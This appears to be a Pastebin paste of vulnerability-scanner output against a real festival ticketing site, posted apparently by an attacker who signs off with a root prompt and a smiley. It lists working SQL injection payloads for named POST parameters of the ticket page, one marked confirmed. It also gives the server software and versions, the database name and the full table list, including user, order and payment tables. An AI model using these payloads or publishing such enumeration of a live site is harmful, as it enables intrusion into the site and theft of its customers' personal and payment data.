Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- === SQL Injection
- Severity : Critical
- Vulnerable URL : http://festivaltrutnov.cz/vstupenky
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: akcecenikCZK
- Parameter Type: Post
- Attack Pattern: '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
- === Boolean Based SQL Injection
- Severity : Critical
- Vulnerable URL : http://festivaltrutnov.cz/vstupenky
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: akcecenikCZK
- Parameter Type: Post
- Attack Pattern: -1 OR 17-7=10
- === [High Possibility] SQL Injection
- Severity : Critical
- Vulnerable URL : http://festivaltrutnov.cz/vstupenky
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: akcecenikCZK
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://festivaltrutnov.cz/vstupenky
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: cp
- Parameter Type: Post
- Attack Pattern: '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
- Severity : Critical
- Vulnerable URL : http://festivaltrutnov.cz/vstupenky
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: email
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity : Critical
- Vulnerable URL : http://festivaltrutnov.cz/vstupenky
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: jmeno
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Severity : Critical
- Vulnerable URL : http://festivaltrutnov.cz/vstupenky
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: mesto
- Parameter Type: Post
- Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
- Analyzing http://festivaltrutnov.cz/vstupenky with 10 input parameter(s)
- Test parameter: stat
- Host IP: 127.0.0.1 (Proxy IP)
- Web Server: Apache/2.2.22 (Debian)
- Powered-by: PHP/5.4.45-0+deb7u2
- DB Server: MySQL
- Current DB: festivaltrutnovcz
- Table found: aktuality
- Table found: aktualityen
- Table found: bands
- Table found: bands11
- Table found: cenikvstupenek
- Table found: cenikvstupenek_2014
- Table found: cenikvstupenek_2015
- Table found: cenikvstupenek_2016
- Table found: forum
- Table found: fotky
- Table found: fotogalerie
- Table found: galerie
- Table found: galerie_nadpisy
- Table found: gopay_notifikace
- Table found: kategorie
- Table found: mayal2014
- Table found: menu
- Table found: menu10
- Table found: menu2010
- Table found: objednavka
- Table found: objednavka_polozky
- Table found: objednavky
- Table found: obrazky
- Table found: obsah
- Table found: obsah2010
- Table found: portal
- Table found: press_web
- Table found: refererstat
- Table found: sez_vstupenky
- Table found: uzivatele
- Table found: video
- Table found: viewstat
- Table found: vstupenky
- Table found: vstupenky10
- Table found: vstupenky2012
- Table found: vstupenky2013
- Table found: vstupenky2014
- Table found: vstupenky2015
- Table found: vstupenky2016
- Table found: wp11_newsletter_users
- Table found: zbozi
- Table found: zbozi_atributy
- Table found: zbozi_atributy_hodnoty
- Table found: zbozi_sklad
- root@subgraph:~# :)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement